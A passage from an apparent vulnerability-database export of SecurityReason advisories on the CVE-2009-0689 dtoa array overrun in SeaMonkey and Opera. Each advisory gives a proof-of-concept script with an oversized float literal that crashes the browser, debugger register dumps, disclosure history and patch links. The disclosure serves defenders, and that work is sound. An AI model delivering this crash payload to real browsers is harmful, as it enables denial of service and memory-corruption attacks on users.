CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - SeaMonkey 1.1.18\r\n\r\nFixed in:\r\n- - SeaMonkey 2.0\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/71\r\n\r\n\r\n- --- 0.Description ---\r\nThe SeaMonkey project is a community effort to develop the SeaMonkey\r\nall-in-one internet application suite (see below). Such a software suite\r\nwas previously made popular by Netscape and Mozilla, and the SeaMonkey\r\nproject continues to develop and deliver high-quality updates to this\r\nconcept. Containing an Internet browser, email &amp; newsgroup client with\r\nan included web feed reader, HTML editor, IRC chat and web development\r\ntools, SeaMonkey is sure to appeal to advanced users, web developers and\r\ncorporate users.\r\n\r\n\r\n- --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code\r\nexecution) ---\r\nThe main problem exist in dtoa implementation. SeaMonkey has the same\r\ndtoa as a KDE, Opera and all BSD systems. This issue has been fixed in\r\nFirefox 3.5.4 and fix\r\n\r\nhttp://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&amp;whitespace_mode=show&amp;file=jsdtoa.c&amp;branch=&amp;root=/cvsroot&amp;subdir=mozilla/js/src&amp;command=DIFF_FRAMESET&amp;rev1=3.41&amp;rev2=3.42\r\n\r\nhas been used to patch SeaMonkey 2.0.\r\n\r\nThis flaw has been detected in may 2009 and signed SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\r\nis possible to call 16&lt;= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat(&quot;9&quot;,299999); ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\nIf we use SeaMonkey to see this PoC, SeaMonkey will crash. For example\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat(&quot;1&quot;,296450); ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\n127# gdb seamonkey-bin seamonkey-bin.core\r\n...\r\n#0 0x28df0ecb in ?? ()\r\n...\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x2 2\r\nedx 0xbfbfd2fc -1077947652\r\nebx 0x28da9b6c 685415276\r\nesp 0xbfbfd2ac 0xbfbfd2ac\r\nebp 0xbfbfd2c8 0xbfbfd2c8\r\nesi 0xb 11\r\nedi 0xb 11\r\neip 0x28df0ecb 0x28df0ecb\r\n...\r\n\r\nesi = esi = 11\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number &quot;CVE-2009-1563&quot;. Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on &quot;CVE-2009-0689&quot;. After some time Mozilla Foundation\r\nSecurity Advisory\r\n(&quot;http://www.mozilla.org/security/announce/2009/mfsa2009-59.html&quot;;)\r\nwas updated with note :\r\n&quot;The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)&quot;.\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\nPlease note:\r\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa\r\nalgorithm is not optimal and allows remote Denial of Service in Firefox\r\n3.5.5 giving long float number.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2IQACgkQpiCeOKaYa9Z2vgCgvqQwFzfwqYsBNbL2To29/o6D\r\nZBgAn0bwlhNtD89nVWtxI2Qf0UA7/ZqB\r\n=JY6k\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-18281", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:31:07", "description": "No description provided by source.", "published": "2009-11-19T00:00:00", "type": "seebug", "title": "Opera 10.01 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "modified": "2009-11-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18283", "id": "SSV:18283", "sourceData": "\n From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/223\r\n\r\n[ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - Opera 10.01\r\n- - Opera 10.10 Beta\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/73\r\n\r\n\r\n- --- 0.Description ---\r\nOpera is a Web browser and Internet suite developed by the Opera\r\nSoftware company. The browser handles common Internet-related tasks such\r\nas displaying Web sites, sending and receiving e-mail messages, managing\r\ncontacts, IRC online chatting, downloading files via BitTorrent, and\r\nreading Web feeds. Opera is offered free of charge for personal\r\ncomputers and mobile phones.\r\n\r\n\r\n- --- 1. Opera 10.01 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exist in dtoa implementation. Opera has a very similar\r\ndtoa algorithm to the BSD, Chrome and Mozilla products. It is the same\r\nissue like SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\r\nis possible to call 16&lt;= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat(&quot;9&quot;,299999); ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\nIf we use Opera to see this PoC, Opera will crash. For example\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat(&quot;1&quot;,296450); ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\nOPERA-CRASHLOG V1 desktop 10.01 1844 windows\r\nOpera.exe 1844 caused exception C0000005 at address 67956906 (Base: 400000)\r\n\r\nRegisters:\r\nEAX=01165C40 EBX=0592064C ECX=A0D589D4 EDX=42000000 ESI=C20471EC\r\nEDI=00000000 EBP=0012E384 ESP=0012E2FC EIP=67956906 FLAGS=00010202\r\nCS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=0000\r\nFPU stack:\r\nC020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800\r\n3FC78000000000000000 10000000000100000000 0BBE0000000000040000\r\n00000000000000000000 2EBA804E2FDE00000000 SW=0122 CW=027F\r\n\r\n127# gdb -q opera opera.core\r\n...\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0 0x2960307b in ?? ()\r\n...\r\n(gdb) i r\r\neax 0x71c71c71 1908874353\r\necx 0x2aa03be4 715144164\r\nedx 0x0 0\r\nebx 0x296177f8 694253560\r\nesp 0xbfbfb650 0xbfbfb650\r\nebp 0xbfbfb698 0xbfbfb698\r\nesi 0x2962d000 694341632\r\nedi 0x0 0\r\neip 0x2960307b 0x2960307b\r\n...\r\n(gdb) x/100x ($esi)-90\r\n0x2962cfa6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfb6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cfc6: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7\r\n0x2962cfd6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfe6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cff6: 0xc71c71c7 0x71c71c71 Cannot access memory at\r\naddress 0x2962cffe\r\n...\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number &quot;CVE-2009-1563&quot;. Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on &quot;CVE-2009-0689&quot;. After some time Mozilla Foundation\r\nSecurity Advisory\r\n(&quot;http://www.mozilla.org/security/announce/2009/mfsa2009-59.html&quot;;)\r\nwas updated with note :\r\n&quot;The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)&quot;.\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\n\r\n- --- 4. Fix ---\r\nOpera fix:\r\nThe vulnerability was fixed in the latest release candidate Opera RC3 :\r\nhttp://snapshot.opera.com/windows/Opera_1010_1890_in.exe\r\nIn shortly time we can expect the final verion of Opera with the fix.\r\n\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4esACgkQpiCeOKaYa9bOkQCcDLKKqvSyE1ZJZebhBBiow8tV\r\nXqQAnR79bagErDfzJ3TV/MlLgrWXsGD7\r\n=/IkD\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-18283", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:29:25", "description": "No description provided by source.", "published": "2009-11-22T00:00:00", "type": "seebug", "title": "Opera 10.01 Remote Array Overrun (Arbitrary code execution)", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "modified": "2009-11-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-14959", "id": "SSV:14959", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - Opera 10.01\r\n- - Opera 10.10 Beta\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/73\r\n\r\n\r\n- --- 0.Description ---\r\nOpera is a Web browser and Internet suite developed by the Opera Software company. \\\r\nThe browser handles common Internet-related tasks such as displaying Web sites, \\\r\nsending and receiving e-mail messages, managing contacts, IRC online chatting, \\\r\ndownloading files via BitTorrent, and reading Web feeds. Opera is offered free of \\\r\ncharge for personal computers and mobile phones.\r\n\r\n\r\n- --- 1. Opera 10.01 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exist in dtoa implementation. Opera has a very similar dtoa \\\r\nalgorithm to the BSD, Chrome and Mozilla products. It is the same issue like \\\r\nSREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good. \r\nMore information about fix for openbsd and similars SREASONRES:20091030, \r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In Kmax has \\\r\ndefined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call \\\r\n16&lt;= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat(&quot;9&quot;,299999); ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\nIf we use Opera to see this PoC, Opera will crash. For example\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat(&quot;1&quot;,296450); ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\nOPERA-CRASHLOG V1 desktop 10.01 1844 windows\r\nOpera.exe 1844 caused exception C0000005 at address 67956906 (Base: 400000)\r\n\r\nRegisters:\r\nEAX=01165C40 EBX=0592064C ECX=A0D589D4 EDX=42000000 ESI=C20471EC\r\nEDI=00000000 EBP=0012E384 ESP=0012E2FC EIP=67956906 FLAGS=00010202\r\nCS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=0000\r\nFPU stack:\r\nC020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800\r\n3FC78000000000000000 10000000000100000000 0BBE0000000000040000\r\n00000000000000000000 2EBA804E2FDE00000000 SW=0122 CW=027F\r\n\r\n127# gdb -q opera opera.core\r\n...\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0 0x2960307b in ?? ()\r\n...\r\n(gdb) i r\r\neax 0x71c71c71 1908874353\r\necx 0x2aa03be4 715144164\r\nedx 0x0 0\r\nebx 0x296177f8 694253560\r\nesp 0xbfbfb650 0xbfbfb650\r\nebp 0xbfbfb698 0xbfbfb698\r\nesi 0x2962d000 694341632\r\nedi 0x0 0\r\neip 0x2960307b 0x2960307b\r\n...\r\n(gdb) x/100x ($esi)-90\r\n0x2962cfa6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfb6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cfc6: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7\r\n0x2962cfd6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfe6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cff6: 0xc71c71c7 0x71c71c71 Cannot access memory at address \\\r\n 0x2962cffe\r\n...\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all vendors about this \\\r\nissue, however, they did not do it. Even greater confusion caused new CVE number \\\r\n&quot;CVE-2009-1563&quot;. Secunia has informed that this vulnerability was only detected in \\\r\nMozilla Firefox, but nobody was aware that the problem affects other products like ( \\\r\nKDE, Chrome ) and it is based on &quot;CVE-2009-0689&quot;. After some time Mozilla Foundation \\\r\nSecurity Advisory (&quot;http://www.mozilla.org/security/announce/2009/mfsa2009-59.html&quot;)\r\nwas updated with note :\r\n&quot;The underlying flaw in the dtoa routines used by Mozilla appears to be essentially \\\r\nthe same as that reported against the libc gdtoa routine by Maksymilian Arciemowicz ( \\\r\nCVE-2009-0689)&quot;. This fact ( new CVE number for Firefox Vulnerability )and PoC in \\\r\njavascript (from Secunia), forced us to official notification all other vendors. We \\\r\npublish all the individual advisories, to formally show all vulnerable software and \\\r\nto avoid wrong CVE number. We do not see any other way to fix this issue in all \\\r\nproducts.\r\n\r\n\r\n- --- 4. Fix ---\r\nOpera fix:\r\nThe vulnerability was fixed in the latest release candidate Opera RC3 : \\\r\nhttp://snapshot.opera.com/windows/Opera_1010_1890_in.exe In shortly time we can \\\r\nexpect the final verion of Opera with the fix. \r\n\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/